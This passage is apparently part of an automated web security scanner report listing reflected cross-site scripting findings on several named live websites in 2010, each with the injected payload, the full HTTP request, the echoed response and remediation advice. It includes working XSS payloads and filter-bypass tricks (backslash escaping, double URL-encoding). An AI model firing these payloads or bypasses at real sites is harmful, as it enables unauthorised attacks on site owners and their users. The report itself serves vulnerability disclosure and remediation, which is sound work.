   this.sectionLevel3 = 'TV Bloopers'; // modified by VIDEO APP
   this.sectionLevel4 = 'Wheel of Fortune One-Letter Winner'; // modified by VIDEO APP
   this.sectionLevel5 = '';

...[SNIP]...

2.78. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/wheel-of-fortune-one-letter-winner/670340060001 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/wheel-of-fortune-one-letter-winner/670340060001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41c28"><img%20src%3da%20onerror%3dalert(1)>fc172e16269 was submitted in the REST URL parameter 3. This input was echoed as 41c28"><img src=a onerror=alert(1)>fc172e16269 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/comedy/tv-bloopers41c28"><img%20src%3da%20onerror%3dalert(1)>fc172e16269/88729112001/wheel-of-fortune-one-letter-winner/670340060001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:46:06 GMT
Server: Apache
Set-Cookie: PHPSESSID=468fece0d12a191740c00e75c3eef1d4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=468fece0d12a191740c00e75c3eef1d4; path=/; httponly
Set-Cookie: 468fece0d12a191740c00e75c3eef1d4=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A34%3A%22wheel-of-fortune-one-letter-winner%22%3Bs%3A8%3A%22video_id%22%3Bi%3A670340060001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A12%3A%22670340060001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-02
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72554

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<a href="http://en.video.canoe.tv/video/comedy/tv-bloopers41c28"><img src=a onerror=alert(1)>fc172e16269/88729112001/page/2">
...[SNIP]...

2.79. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/worst-family-feud-answer-ever/35607309001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/worst-family-feud-answer-ever/35607309001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57812"><img%20src%3da%20onerror%3dalert(1)>2ea1a00c9e5 was submitted in the REST URL parameter 2. This input was echoed as 57812"><img src=a onerror=alert(1)>2ea1a00c9e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/comedy57812"><img%20src%3da%20onerror%3dalert(1)>2ea1a00c9e5/tv-bloopers/88729112001/worst-family-feud-answer-ever/35607309001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:46:32 GMT
Server: Apache
Set-Cookie: PHPSESSID=e4b8be8984b422f0d0a3effc9eeb6bd1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=e4b8be8984b422f0d0a3effc9eeb6bd1; path=/; httponly
Set-Cookie: e4b8be8984b422f0d0a3effc9eeb6bd1=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A29%3A%22worst-family-feud-answer-ever%22%3Bs%3A8%3A%22video_id%22%3Bi%3A35607309001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2235607309001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<a href="http://en.video.canoe.tv/video/comedy57812gtltimg-srca-onerroralert1gt2ea1a00c9e5/tv-bloopers/88729112001" title="Comedy57812"><img src=a onerror=alert(1)>2ea1a00c9e5" id="crumb_section">
...[SNIP]...

2.80. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/worst-family-feud-answer-ever/35607309001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/worst-family-feud-answer-ever/35607309001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5629f\'%3b8e67f8f3d69 was submitted in the REST URL parameter 2. This input was echoed as 5629f\\';8e67f8f3d69 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /video/comedy5629f\'%3b8e67f8f3d69/tv-bloopers/88729112001/worst-family-feud-answer-ever/35607309001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:47:05 GMT
Server: Apache
Set-Cookie: PHPSESSID=278d47df0537eca082964320b0baafd9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=278d47df0537eca082964320b0baafd9; path=/; httponly
Set-Cookie: 278d47df0537eca082964320b0baafd9=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A29%3A%22worst-family-feud-answer-ever%22%3Bs%3A8%3A%22video_id%22%3Bi%3A35607309001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2235607309001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<![CDATA[

function OmnitureVariables(){
   this.mainsection = 'video';
   this.sectionLevel2 = 'Comedy5629f\\';8e67f8f3d69'; // modified by VIDEO APP
   this.sectionLevel3 = 'TV Bloopers'; // modified by VIDEO APP
   this.sectionLevel4 = 'Worst Family Feud Answer Ever'; // modified by VIDEO APP
   this.sectionLevel5 = '';
   this
...[SNIP]...

2.81. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/worst-family-feud-answer-ever/35607309001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/worst-family-feud-answer-ever/35607309001

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bbec2<img%20src%3da%20onerror%3dalert(1)>ae2a3cc57ed was submitted in the REST URL parameter 2. This input was echoed as bbec2<img src=a onerror=alert(1)>ae2a3cc57ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/comedybbec2<img%20src%3da%20onerror%3dalert(1)>ae2a3cc57ed/tv-bloopers/88729112001/worst-family-feud-answer-ever/35607309001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:47:12 GMT
Server: Apache
Set-Cookie: PHPSESSID=51882df36f69669f92ef62aa2ac00cd8; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=51882df36f69669f92ef62aa2ac00cd8; path=/; httponly
Set-Cookie: 51882df36f69669f92ef62aa2ac00cd8=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A29%3A%22worst-family-feud-answer-ever%22%3Bs%3A8%3A%22video_id%22%3Bi%3A35607309001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2235607309001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<img src=a onerror=alert(1)>ae2a3cc57ed" id="crumb_section">Comedybbec2<img src=a onerror=alert(1)>ae2a3cc57ed</a>
...[SNIP]...

2.82. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/worst-family-feud-answer-ever/35607309001 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/worst-family-feud-answer-ever/35607309001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7f4a"><img%20src%3da%20onerror%3dalert(1)>2dd7f71493b was submitted in the REST URL parameter 3. This input was echoed as e7f4a"><img src=a onerror=alert(1)>2dd7f71493b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/comedy/tv-blooperse7f4a"><img%20src%3da%20onerror%3dalert(1)>2dd7f71493b/88729112001/worst-family-feud-answer-ever/35607309001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:47:18 GMT
Server: Apache
Set-Cookie: PHPSESSID=b1c2d0d32eef55c209c1673e80cf04cd; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=b1c2d0d32eef55c209c1673e80cf04cd; path=/; httponly
Set-Cookie: b1c2d0d32eef55c209c1673e80cf04cd=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A29%3A%22worst-family-feud-answer-ever%22%3Bs%3A8%3A%22video_id%22%3Bi%3A35607309001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2235607309001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<a href="http://en.video.canoe.tv/video/comedy/tv-blooperse7f4a"><img src=a onerror=alert(1)>2dd7f71493b/88729112001/page/2">
...[SNIP]...

2.83. https://events.deloitte-canada.12hna.com/preferences/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://events.deloitte-canada.12hna.com
Path:   /preferences/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 88aa0<script>alert(1)</script>012708f88c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /preferences88aa0<script>alert(1)</script>012708f88c4/ HTTP/1.1
Host: events.deloitte-canada.12hna.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 03:47:29 GMT
Server: Apache
Set-Cookie: PHPSESSID=cea7b33856f84f12c9787fe043eae1f6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent,Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /preferences88aa0<script>alert(1)</script>012708f88c4/ was not found on this server.<P>
...[SNIP]...

2.84. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/about_us [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en/about_us

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27ea6"><img%20src%3da%20onerror%3dalert(1)>28bf2c88dc0 was submitted in the REST URL parameter 6. This input was echoed as 27ea6"><img src=a onerror=alert(1)>28bf2c88dc0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en27ea6"><img%20src%3da%20onerror%3dalert(1)>28bf2c88dc0/about_us HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:03:13 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en27ea6"><img src=a onerror=alert(1)>28bf2c88dc0; Expires=Fri, 25-Nov-2011 03:03:12 GMT; Path=/cms/
Last-Modified: Thu, 25 Nov 2010 03:03:13 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 18492
Connection: close


<!-- try /about_us -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
<meta http-equi
...[SNIP]...
<base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en27ea6"><img src=a onerror=alert(1)>28bf2c88dc0/about_us/index.html">
...[SNIP]...

2.85. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/about_us [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en/about_us

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24d06"-alert(1)-"c79e5188c0f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06"-alert(1)-"c79e5188c0f/about_us HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:03:21 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en24d06"-alert(1)-"c79e5188c0f; Expires=Fri, 25-Nov-2011 03:03:16 GMT; Path=/cms/
Last-Modified: Thu, 25 Nov 2010 03:03:21 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 17502
Connection: close


<!-- try /about_us -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
<meta http-equi
...[SNIP]...
<link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06"-alert(1)-"c79e5188c0f/shared/css/GereSite_nn.css' TYPE='text/css'>
...[SNIP]...

2.86. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/about_us/contact.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en/about_us/contact.html

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae706"-alert(1)-"4d25068fe5a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/enae706"-alert(1)-"4d25068fe5a/about_us/contact.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:03:34 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=enae706"-alert(1)-"4d25068fe5a; Expires=Fri, 25-Nov-2011 03:03:29 GMT; Path=/cms/
Last-Modified: Thu, 25 Nov 2010 03:03:34 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 24665
Connection: close


<!-- try /about_us -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
<meta http-equi
...[SNIP]...
<link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/enae706"-alert(1)-"4d25068fe5a/shared/css/GereSite_nn.css' TYPE='text/css'>
...[SNIP]...

2.87. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/about_us/contact.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en/about_us/contact.html

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a084"><img%20src%3da%20onerror%3dalert(1)>71aa38af2a was submitted in the REST URL parameter 6. This input was echoed as 5a084"><img src=a onerror=alert(1)>71aa38af2a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en5a084"><img%20src%3da%20onerror%3dalert(1)>71aa38af2a/about_us/contact.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:03:23 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en5a084"><img src=a onerror=alert(1)>71aa38af2a; Expires=Fri, 25-Nov-2011 03:03:23 GMT; Path=/cms/
Last-Modified: Thu, 25 Nov 2010 03:03:23 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 25821
Connection: close


<!-- try /about_us -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
<meta http-equi
...[SNIP]...
<base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en5a084"><img src=a onerror=alert(1)>71aa38af2a/about_us/contact.html">
...[SNIP]...

2.88. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/about_us/privacy_policy.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en/about_us/privacy_policy.html

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18b29"-alert(1)-"3781ed8f5f2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en18b29"-alert(1)-"3781ed8f5f2/about_us/privacy_policy.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:03:16 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en18b29"-alert(1)-"3781ed8f5f2; Expires=Fri, 25-Nov-2011 03:03:05 GMT; Path=/cms/
Last-Modified: Thu, 25 Nov 2010 03:03:16 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 26225
Connection: close


<!-- try /about_us -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
<meta http-equiv="conte
...[SNIP]...
<link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en18b29"-alert(1)-"3781ed8f5f2/shared/css/GereSite_nn.css' TYPE='text/css'>
...[SNIP]...

2.89. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/about_us/terms.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en/about_us/terms.html

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4558"><img%20src%3da%20onerror%3dalert(1)>0a02bfb442d was submitted in the REST URL parameter 6. This input was echoed as a4558"><img src=a onerror=alert(1)>0a02bfb442d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/ena4558"><img%20src%3da%20onerror%3dalert(1)>0a02bfb442d/about_us/terms.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:03:33 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=ena4558"><img src=a onerror=alert(1)>0a02bfb442d; Expires=Fri, 25-Nov-2011 03:03:33 GMT; Path=/cms/
Last-Modified: Thu, 25 Nov 2010 03:03:34 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 42940
Connection: close


<!-- try /about_us -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
<meta http-equiv="conte
...[SNIP]...
<base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/ena4558"><img src=a onerror=alert(1)>0a02bfb442d/about_us/terms.html">
...[SNIP]...

2.90. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/about_us/terms.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en/about_us/terms.html

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f993"-alert(1)-"dfd6430fe33 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en5f993"-alert(1)-"dfd6430fe33/about_us/terms.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:03:41 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en5f993"-alert(1)-"dfd6430fe33; Expires=Fri, 25-Nov-2011 03:03:36 GMT; Path=/cms/
Last-Modified: Thu, 25 Nov 2010 03:03:41 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 42022
Connection: close


<!-- try /about_us -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
<meta http-equiv="conte
...[SNIP]...
<link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en5f993"-alert(1)-"dfd6430fe33/shared/css/GereSite_nn.css' TYPE='text/css'>
...[SNIP]...

